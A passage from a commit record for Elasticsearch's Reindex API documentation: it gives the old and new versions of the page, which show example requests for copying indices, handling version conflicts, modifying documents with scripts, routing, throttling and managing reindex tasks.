S\/elasticsearch,geidies\/elasticsearch,nknize\/elasticsearch,a2lin\/elasticsearch,masaruh\/elasticsearch,liweinan0423\/elasticsearch,LeoYao\/elasticsearch,geidies\/elasticsearch,qwerty4030\/elasticsearch,gmarz\/elasticsearch,alexshadow007\/elasticsearch,winstonewert\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JSCooke\/elasticsearch,shreejay\/elasticsearch,camilojd\/elasticsearch,dongjoon-hyun\/elasticsearch,JervyShi\/elasticsearch,lks21c\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,a2lin\/elasticsearch,njlawton\/elasticsearch,nazarewk\/elasticsearch,Stacey-Gammon\/elasticsearch,fernandozhu\/elasticsearch,nknize\/elasticsearch,yanjunh\/elasticsearch,jimczi\/elasticsearch,winstonewert\/elasticsearch,Helen-Zhao\/elasticsearch,IanvsPoplicola\/elasticsearch,naveenhooda2000\/elasticsearch,sreeramjayan\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,trangvh\/elasticsearch,ricardocerq\/elasticsearch,elasticdog\/elasticsearch,umeshdangat\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elassandra,i-am-Nathan\/elasticsearch,dpursehouse\/elasticsearch,pozhidaevak\/elasticsearch,glefloch\/elasticsearch,fernandozhu\/elasticsearch,camilojd\/elasticsearch,sreeramjayan\/elasticsearch,i-am-Nathan\/elasticsearch,gmarz\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mortonsykes\/elasticsearch,camilojd\/elasticsearch,mortonsykes\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,StefanGor\/elasticsearch,myelin\/elasticsearch,HonzaKral\/elasticsearch,nilabhsagar\/elasticsearch,rlugojr\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,JervyShi\/elasticsearch,palecur\/elasticsearch,wenpos\/elasticsearch,lks21c\/elasticsearch,wenpos\/elasticsearch,spiegela\/elasticsearch,C-Bish\/elasticsearch,strapdata\/elassandra5-rc,coding0011\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGar
ciaAlves\/elasticsearch,MaineC\/elasticsearch,wangtuo\/elasticsearch,henakamaMSFT\/elasticsearch,wuranbo\/elasticsearch,mikemccand\/elasticsearch,masaruh\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,vroyer\/elassandra,cwurm\/elasticsearch,girirajsharma\/elasticsearch,nilabhsagar\/elasticsearch,obourgain\/elasticsearch,vroyer\/elassandra,alexshadow007\/elasticsearch,camilojd\/elasticsearch,artnowo\/elasticsearch,gfyoung\/elasticsearch,Helen-Zhao\/elasticsearch,brandonkearby\/elasticsearch,avikurapati\/elasticsearch,cwurm\/elasticsearch,winstonewert\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,pozhidaevak\/elasticsearch,obourgain\/elasticsearch,camilojd\/elasticsearch,shreejay\/elasticsearch,fforbeck\/elasticsearch,jimczi\/elasticsearch,LewayneNaidoo\/elasticsearch,i-am-Nathan\/elasticsearch,ricardocerq\/elasticsearch,mikemccand\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,gfyoung\/elasticsearch,rlugojr\/elasticsearch,Shepard1212\/elasticsearch,awislowski\/elasticsearch,StefanGor\/elasticsearch,gfyoung\/elasticsearch,ZTE-PaaS\/elasticsearch,kalimatas\/elasticsearch,njlawton\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,mortonsykes\/elasticsearch,IanvsPoplicola\/elasticsearch,nilabhsagar\/elasticsearch,avikurapati\/elasticsearch,robin13\/elasticsearch,fernandozhu\/elasticsearch,mohit\/elasticsearch,IanvsPoplicola\/elasticsearch,spiegela\/elasticsearch,girirajsharma\/elasticsearch,brandonkearby\/elasticsearch,fernandozhu\/elasticsearch,umeshdangat\/elasticsearch,mjason3\/elasticsearch,liweinan0423\/elasticsearch,MisterAndersen\/elasticsearch,C-Bish\/elasticsearch,nezirus\/elasticsearch,nilabhsagar\/elasticsearch,uschindler\/elasticsearch,jprante\/elasticsearch,geidies\/elasticsearch,mohit\/elasticsearch,nknize\/elasticsearch,sneivandt\/elasticsearch,trangvh\/elasticsearch,nezirus\/elasticsearch,artnowo\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,JackyMai\/elasticsearch,alexshadow007\/elasticsearch,sreeramjayan\/elasticsearch,bawse\/elasticsearch,umeshdangat\/elasticsearch,mikemccand\/elasticsearch,wuranbo\/elasticsearch,nezirus\/elasticsearch,a2lin\/elasticsearch,scorpionvicky\/elasticsearch,IanvsPoplicola\/elasticsearch,C-Bish\/elasticsearch,njlawton\/elasticsearch,a2lin\/elasticsearch,LewayneNaidoo\/elasticsearch,bawse\/elasticsearch,HonzaKral\/elasticsearch,henakamaMSFT\/elasticsearch,artnowo\/elasticsearch,jimczi\/elasticsearch,elasticdog\/elasticsearch,coding0011\/elasticsearch,elasticdog\/elasticsearch,rlugojr\/elasticsearch,robin13\/elasticsearch,artnowo\/elasticsearch,palecur\/elasticsearch,gfyoung\/elasticsearch,awislowski\/elasticsearch,Shepard1212\/elasticsearch,dongjoon-hyun\/elasticsearch,scottsom\/elasticsearch,dpursehouse\/elasticsearch,wangtuo\/elasticsearch,dongjoon-hyun\/elasticsearch,rlugojr\/elasticsearch,JSCooke\/elasticsearch,palecur\/elasticsearch,spiegela\/elasticsearch,MisterAndersen\/elasticsearch,liweinan0423\/elasticsearch,fred84\/elasticsearch,coding0011\/elasticsearch,MisterAndersen\/elasticsearch,njlawton\/elasticsearch,geidies\/elasticsearch,henakamaMSFT\/elasticsearch,jprante\/elasticsearch,JackyMai\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,zkidkid\/elasticsearch,strapdata\/elassandra,dpursehouse\/elasticsearch,rlugojr\/elasticsearch,sreeramjayan\/elasticsearch,jprante\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,brandonkearby\/elasticsearch,ZTE-PaaS\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elasticassand
ra,glefloch\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,nezirus\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,nazarewk\/elasticsearch,JackyMai\/elasticsearch,fernandozhu\/elasticsearch,alexshadow007\/elasticsearch,MaineC\/elasticsearch,fforbeck\/elasticsearch,markwalkom\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,nknize\/elasticsearch,wuranbo\/elasticsearch,henakamaMSFT\/elasticsearch,IanvsPoplicola\/elasticsearch,camilojd\/elasticsearch,obourgain\/elasticsearch","old_file":"docs\/reference\/docs\/reindex.asciidoc","new_file":"docs\/reference\/docs\/reindex.asciidoc","new_contents":"[[docs-reindex]]\n== Reindex API\n\nexperimental[The reindex API is new and should still be considered experimental. The API may change in ways that are not backwards compatible]\n\nThe most basic form of `_reindex` just copies documents from one index to another.\nThis will copy documents from the `twitter` index into the `new_twitter` index:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:big_twitter]\n\nThat will return something like this:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\" : 147,\n \"timed_out\": false,\n \"created\": 120,\n \"updated\": 0,\n \"batches\": 1,\n \"version_conflicts\": 0,\n \"noops\": 0,\n \"retries\": {\n \"bulk\": 0,\n \"search\": 0\n },\n \"throttled_millis\": 0,\n \"requests_per_second\": \"unlimited\",\n \"throttled_until_millis\": 0,\n \"total\": 120,\n \"failures\" : [ ]\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\" : 147\/\"took\" : \"$body.took\"\/]\n\nJust like <<docs-update-by-query,`_update_by_query`>>, `_reindex` gets a\nsnapshot of the source index but its target must be a **different** index so\nversion conflicts are unlikely. The `dest` element can be configured like the\nindex API to control optimistic concurrency control. Just leaving out\n`version_type` (as above) or setting it to `internal` will cause Elasticsearch\nto blindly dump documents into the target, overwriting any that happen to have\nthe same type and id:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"version_type\": \"internal\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nSetting `version_type` to `external` will cause Elasticsearch to preserve the\n`version` from the source, create any documents that are missing, and update\nany documents that have an older version in the destination index than they do\nin the source index:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"version_type\": \"external\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nSettings `op_type` to `create` will cause `_reindex` to only create missing\ndocuments in the target index. 
All existing documents will cause a version\nconflict:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"op_type\": \"create\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nBy default version conflicts abort the `_reindex` process but you can just\ncount them by setting `\"conflicts\": \"proceed\"` in the request body:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"conflicts\": \"proceed\",\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"op_type\": \"create\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nYou can limit the documents by adding a type to the `source` or by adding a\nquery. This will only copy ++tweet++'s made by `kimchy` into `new_twitter`:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\",\n \"type\": \"tweet\",\n \"query\": {\n \"term\": {\n \"user\": \"kimchy\"\n }\n }\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\n`index` and `type` in `source` can both be lists, allowing you to copy from\nlots of sources in one request. This will copy documents from the `tweet` and\n`post` types in the `twitter` and `blog` indices. It'd include the `post` type in\nthe `twitter` index and the `tweet` type in the `blog` index. If you want to be\nmore specific you'll need to use the `query`. It also makes no effort to handle\nID collisions. The target index will remain valid but it's not easy to predict\nwhich document will survive because the iteration order isn't well defined.\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": [\"twitter\", \"blog\"],\n \"type\": [\"tweet\", \"post\"]\n },\n \"dest\": {\n \"index\": \"all_together\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT twitter\\nPUT blog\\nGET _cluster\\\/health?wait_for_status=yellow\\n\/]\n\nIt's also possible to limit the number of processed documents by setting\n`size`. This will only copy a single document from `twitter` to\n`new_twitter`:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"size\": 1,\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nIf you want a particular set of documents from the twitter index, you'll\nneed to sort. Sorting makes the scroll less efficient but in some contexts\nit's worth it. If possible, prefer a more selective query to `size` and `sort`.\nThis will copy 10000 documents from `twitter` into `new_twitter`:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"size\": 10000,\n \"source\": {\n \"index\": \"twitter\",\n \"sort\": { \"date\": \"desc\" }\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nLike `_update_by_query`, `_reindex` supports a script that modifies the\ndocument. Unlike `_update_by_query`, the script is allowed to modify the\ndocument's metadata. 
This example bumps the version of the source document:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"version_type\": \"external\"\n },\n \"script\": {\n \"script\": \"if (ctx._source.foo == 'bar') {ctx._version++; ctx._source.remove('foo')}\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nThink of the possibilities! Just be careful! With great power.... You can\nchange:\n\n * `_id`\n * `_type`\n * `_index`\n * `_version`\n * `_routing`\n * `_parent`\n * `_timestamp`\n * `_ttl`\n\nSetting `_version` to `null` or clearing it from the `ctx` map is just like not\nsending the version in an indexing request. It will cause that document to be\noverwritten in the target index regardless of the version on the target or the\nversion type you use in the `_reindex` request.\n\nBy default if `_reindex` sees a document with routing then the routing is\npreserved unless it's changed by the script. You can set `routing` on the\n`dest` request to change this:\n\n`keep`::\n\nSets the routing on the bulk request sent for each match to the routing on\nthe match. The default.\n\n`discard`::\n\nSets the routing on the bulk request sent for each match to null.\n\n`=<some text>`::\n\nSets the routing on the bulk request sent for each match to all text after\nthe `=`.\n\nFor example, you can use the following request to copy all documents from\nthe `source` index with the company name `cat` into the `dest` index with\nrouting set to `cat`.\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"source\",\n \"query\": {\n \"match\": {\n \"company\": \"cat\"\n }\n }\n },\n \"dest\": {\n \"index\": \"dest\",\n \"routing\": \"=cat\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT source\\nGET _cluster\\\/health?wait_for_status=yellow\\n\/]\n\nBy default `_reindex` uses scroll batches of 1000. You can change the\nbatch size with the `size` field in the `source` element:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"source\",\n \"size\": 100\n },\n \"dest\": {\n \"index\": \"dest\",\n \"routing\": \"=cat\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT source\\nGET _cluster\\\/health?wait_for_status=yellow\\n\/]\n\nReindex can also use the <<ingest>> feature by specifying a\n`pipeline` like this:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"source\"\n },\n \"dest\": {\n \"index\": \"dest\",\n \"pipeline\": \"some_ingest_pipeline\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT source\\nGET _cluster\\\/health?wait_for_status=yellow\\n\/]\n\n[float]\n=== URL Parameters\n\nIn addition to the standard parameters like `pretty`, the Reindex API also\nsupports `refresh`, `wait_for_completion`, `consistency`, `timeout`, and\n`requests_per_second`.\n\nSending the `refresh` url parameter will cause all indexes to which the request\nwrote to be refreshed. 
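As a sketch (reusing the `twitter` example from earlier in this page), the parameters go on the\nrequest line; `refresh=true` and `wait_for_completion=false` are two of the parameters listed\nabove:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex?refresh=true&wait_for_completion=false\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\n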
Reindex's `refresh` is different from the Index API's `refresh`\nparameter, which causes just the shard that received the new data to be refreshed.\n\nIf the request contains `wait_for_completion=false` then Elasticsearch will\nperform some preflight checks, launch the request, and then return a `task`\nwhich can be used with <<docs-reindex-task-api,Tasks APIs>> to cancel or get\nthe status of the task. For now, once the request is finished the task is gone\nand the only place to look for the ultimate result of the task is in the\nElasticsearch log file. This will be fixed soon.\n\n`consistency` controls how many copies of a shard must respond to each write\nrequest. `timeout` controls how long each write request waits for unavailable\nshards to become available. Both work exactly how they work in the\n<<docs-bulk,Bulk API>>.\n\n`requests_per_second` can be set to any decimal number (`1.4`, `6`, `1000`, etc.)\nand throttles the number of requests per second that the reindex issues. The\nthrottling is done by waiting between bulk batches so that it can manipulate the\nscroll timeout. The wait time is the difference between\n`requests_in_the_batch \/ requests_per_second` and the time the batch took to\ncomplete. For example, at `requests_per_second=500`, a batch of 1000 documents\nthat took half a second to write is followed by a wait of\n`1000 \/ 500 - 0.5 = 1.5` seconds. Since the batch isn't broken into multiple\nbulk requests, large batch sizes will cause Elasticsearch to create many requests\nand then wait for a while before starting the next set. This is \"bursty\" instead\nof \"smooth\". The default is `unlimited`, which is also the only non-number value\nthat it accepts.\n\n[float]\n=== Response body\n\nThe JSON response looks like this:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\" : 639,\n \"updated\": 0,\n \"created\": 123,\n \"batches\": 1,\n \"version_conflicts\": 2,\n \"retries\": {\n \"bulk\": 0,\n \"search\": 0\n },\n \"throttled_millis\": 0,\n \"failures\" : [ ]\n}\n--------------------------------------------------\n\n`took`::\n\nThe number of milliseconds from start to end of the whole operation.\n\n`updated`::\n\nThe number of documents that were successfully updated.\n\n`created`::\n\nThe number of documents that were successfully created.\n\n`batches`::\n\nThe number of scroll responses pulled back by the reindex.\n\n`version_conflicts`::\n\nThe number of version conflicts that reindex hit.\n\n`retries`::\n\nThe number of retries attempted by reindex. `bulk` is the number of bulk\nactions retried and `search` is the number of search actions retried.\n\n`throttled_millis`::\n\nNumber of milliseconds the request slept to conform to `requests_per_second`.\n\n`failures`::\n\nArray of all indexing failures. If this is non-empty then the request aborted\nbecause of those failures. 
See `conflicts` for how to prevent version conflicts\nfrom aborting the operation.\n\n[float]\n[[docs-reindex-task-api]]\n=== Works with the Task API\n\nWhile Reindex is running you can fetch its status using the\n<<tasks,Task API>>:\n\n[source,js]\n--------------------------------------------------\nGET _tasks?detailed=true&actions=*reindex\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe response looks like:\n\n[source,js]\n--------------------------------------------------\n{\n \"nodes\" : {\n \"r1A2WoRbTwKZ516z6NEs5A\" : {\n \"name\" : \"Tyrannus\",\n \"transport_address\" : \"127.0.0.1:9300\",\n \"host\" : \"127.0.0.1\",\n \"ip\" : \"127.0.0.1:9300\",\n \"attributes\" : {\n \"testattr\" : \"test\",\n \"portsfile\" : \"true\"\n },\n \"tasks\" : {\n \"r1A2WoRbTwKZ516z6NEs5A:36619\" : {\n \"node\" : \"r1A2WoRbTwKZ516z6NEs5A\",\n \"id\" : 36619,\n \"type\" : \"transport\",\n \"action\" : \"indices:data\/write\/reindex\",\n \"status\" : { <1>\n \"total\" : 6154,\n \"updated\" : 3500,\n \"created\" : 0,\n \"deleted\" : 0,\n \"batches\" : 4,\n \"version_conflicts\" : 0,\n \"noops\" : 0,\n \"retries\": {\n \"bulk\": 0,\n \"search\": 0\n },\n \"throttled_millis\": 0\n },\n \"description\" : \"\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> This object contains the actual status. It is just like the response JSON\nwith the important addition of the `total` field. `total` is the total number\nof operations that the reindex expects to perform. You can estimate the\nprogress by adding the `updated`, `created`, and `deleted` fields. The request\nwill finish when their sum is equal to the `total` field.\n\n\n[float]\n[[docs-reindex-cancel-task-api]]\n=== Works with the Cancel Task API\n\nAny Reindex can be canceled using the <<tasks,Task Cancel API>>:\n\n[source,js]\n--------------------------------------------------\nPOST _tasks\/taskid:1\/_cancel\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe `task_id` can be found using the tasks API above.\n\nCancellation should happen quickly but might take a few seconds. The task status\nAPI above will continue to list the task until it wakes up to cancel itself.\n\n\n[float]\n[[docs-reindex-rethrottle]]\n=== Rethrottling\n\nThe value of `requests_per_second` can be changed on a running reindex using\nthe `_rethrottle` API:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\/taskid:1\/_rethrottle?requests_per_second=unlimited\n--------------------------------------------------\n\/\/ CONSOLE\n\nThe `task_id` can be found using the tasks API above.\n\nJust like when setting it on the `_reindex` API, `requests_per_second` can be\neither `unlimited` to disable throttling or any decimal number like `1.7` or\n`12` to throttle to that level. Rethrottling that speeds up the query takes\neffect immediately, but rethrottling that slows down the query will take effect\nonly after completing the current batch. This prevents scroll timeouts.\n\n\n[float]\n=== Reindex to change the name of a field\n\n`_reindex` can be used to build a copy of an index with renamed fields. 
Say you\ncreate an index containing documents that look like this:\n\n[source,js]\n--------------------------------------------------\nPOST test\/test\/1?refresh\n{\n \"text\": \"words words\",\n \"flag\": \"foo\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nBut you don't like the name `flag` and want to replace it with `tag`.\n`_reindex` can create the other index for you:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"test\"\n },\n \"dest\": {\n \"index\": \"test2\"\n },\n \"script\": {\n \"inline\": \"ctx._source.tag = ctx._source.remove(\\\"flag\\\")\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nNow you can get the new document:\n\n[source,js]\n--------------------------------------------------\nGET test2\/test\/1\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nand it'll look like:\n\n[source,js]\n--------------------------------------------------\n{\n \"found\": true,\n \"_id\": \"1\",\n \"_index\": \"test2\",\n \"_type\": \"test\",\n \"_version\": 1,\n \"_source\": {\n \"text\": \"words words\",\n \"tag\": \"foo\"\n }\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE\n\nOr you can search by `tag` or whatever you want.\n","old_contents":"[[docs-reindex]]\n== Reindex API\n\nexperimental[The reindex API is new and should still be considered experimental. The API may change in ways that are not backwards compatible]\n\nThe most basic form of `_reindex` just copies documents from one index to another.\nThis will copy documents from the `twitter` index into the `new_twitter` index:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:big_twitter]\n\nThat will return something like this:\n\n[source,js]\n--------------------------------------------------\n{\n \"took\" : 147,\n \"timed_out\": false,\n \"created\": 120,\n \"updated\": 0,\n \"batches\": 1,\n \"version_conflicts\": 0,\n \"noops\": 0,\n \"retries\": {\n \"bulk\": 0,\n \"search\": 0\n },\n \"throttled_millis\": 0,\n \"requests_per_second\": \"unlimited\",\n \"throttled_until_millis\": 0,\n \"total\": 120,\n \"failures\" : [ ]\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"took\" : 147\/\"took\" : \"$body.took\"\/]\n\nJust like <<docs-update-by-query,`_update_by_query`>>, `_reindex` gets a\nsnapshot of the source index but its target must be a **different** index so\nversion conflicts are unlikely. The `dest` element can be configured like the\nindex API to control optimistic concurrency control. 
Just leaving out\n`version_type` (as above) or setting it to `internal` will cause Elasticsearch\nto blindly dump documents into the target, overwriting any that happen to have\nthe same type and id:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"version_type\": \"internal\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nSetting `version_type` to `external` will cause Elasticsearch to preserve the\n`version` from the source, create any documents that are missing, and update\nany documents that have an older version in the destination index than they do\nin the source index:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"version_type\": \"external\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nSettings `op_type` to `create` will cause `_reindex` to only create missing\ndocuments in the target index. All existing documents will cause a version\nconflict:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"op_type\": \"create\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nBy default version conflicts abort the `_reindex` process but you can just\ncount them by settings `\"conflicts\": \"proceed\"` in the request body:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"conflicts\": \"proceed\",\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"op_type\": \"create\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nYou can increase the default batch size by setting the `size` parameter (which defaults to `1000`) to the `source`. Note that it is different than the `size` parameter available at the root, which limits the number of documents (see below).\n\n[source,js]\n--------------------------------------------------\nPOST \/_reindex\n{\n \"source\": {\n \"index\": \"twitter\",\n \"size\": 2000\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ AUTOSENSE\n\nYou can limit the documents by adding a type to the `source` or by adding a\nquery. This will only copy ++tweet++'s made by `kimchy` into `new_twitter`:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\",\n \"type\": \"tweet\",\n \"query\": {\n \"term\": {\n \"user\": \"kimchy\"\n }\n }\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\n`index` and `type` in `source` can both be lists, allowing you to copy from\nlots of sources in one request. This will copy documents from the `tweet` and\n`post` types in the `twitter` and `blog` index. It'd include the `post` type in\nthe `twitter` index and the `tweet` type in the `blog` index. If you want to be\nmore specific you'll need to use the `query`. It also makes no effort to handle\nID collisions. 
The target index will remain valid but it's not easy to predict\nwhich document will survive because the iteration order isn't well defined.\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": [\"twitter\", \"blog\"],\n \"type\": [\"tweet\", \"post\"]\n },\n \"dest\": {\n \"index\": \"all_together\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT twitter\\nPUT blog\\nGET _cluster\\\/health?wait_for_status=yellow\\n\/]\n\nIt's also possible to limit the number of processed documents by setting\n`size`. This will only copy a single document from `twitter` to\n`new_twitter`:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"size\": 1,\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nIf you want a particular set of documents from the twitter index you'll\nneed to sort. Sorting makes the scroll less efficient but in some contexts\nit's worth it. If possible, prefer a more selective query to `size` and `sort`.\nThis will copy 10000 documents from `twitter` into `new_twitter`:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"size\": 10000,\n \"source\": {\n \"index\": \"twitter\",\n \"sort\": { \"date\": \"desc\" }\n },\n \"dest\": {\n \"index\": \"new_twitter\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nLike `_update_by_query`, `_reindex` supports a script that modifies the\ndocument. Unlike `_update_by_query`, the script is allowed to modify the\ndocument's metadata. This example bumps the version of the source document:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"twitter\"\n },\n \"dest\": {\n \"index\": \"new_twitter\",\n \"version_type\": \"external\"\n },\n \"script\": {\n \"script\": \"if (ctx._source.foo == 'bar') {ctx._version++; ctx._source.remove('foo')}\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[setup:twitter]\n\nThink of the possibilities! Just be careful! With great power.... You can\nchange:\n\n * `_id`\n * `_type`\n * `_index`\n * `_version`\n * `_routing`\n * `_parent`\n * `_timestamp`\n * `_ttl`\n\nSetting `_version` to `null` or clearing it from the `ctx` map is just like not\nsending the version in an indexing request. It will cause that document to be\noverwritten in the target index regardless of the version on the target or the\nversion type you use in the `_reindex` request.\n\nBy default if `_reindex` sees a document with routing then the routing is\npreserved unless it's changed by the script. You can set `routing` on the\n`dest` request to change this:\n\n`keep`::\n\nSets the routing on the bulk request sent for each match to the routing on\nthe match. 
The default.\n\n`discard`::\n\nSets the routing on the bulk request sent for each match to null.\n\n`=<some text>`::\n\nSets the routing on the bulk request sent for each match to all text after\nthe `=`.\n\nFor example, you can use the following request to copy all documents from\nthe `source` index with the company name `cat` into the `dest` index with\nrouting set to `cat`.\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"source\",\n \"query\": {\n \"match\": {\n \"company\": \"cat\"\n }\n }\n },\n \"dest\": {\n \"index\": \"dest\",\n \"routing\": \"=cat\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT source\\nGET _cluster\\\/health?wait_for_status=yellow\\n\/]\n\nBy default `_reindex` uses scroll batches of 1000. You can change the\nbatch size with the `size` field in the `source` element:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"source\",\n \"size\": 100\n },\n \"dest\": {\n \"index\": \"dest\",\n \"routing\": \"=cat\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT source\\nGET _cluster\\\/health?wait_for_status=yellow\\n\/]\n\nReindex can also use the <<ingest>> feature by specifying a\n`pipeline` like this:\n\n[source,js]\n--------------------------------------------------\nPOST _reindex\n{\n \"source\": {\n \"index\": \"source\"\n },\n \"dest\": {\n \"index\": \"dest\",\n \"pipeline\": \"some_ingest_pipeline\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/^\/PUT source\\nGET 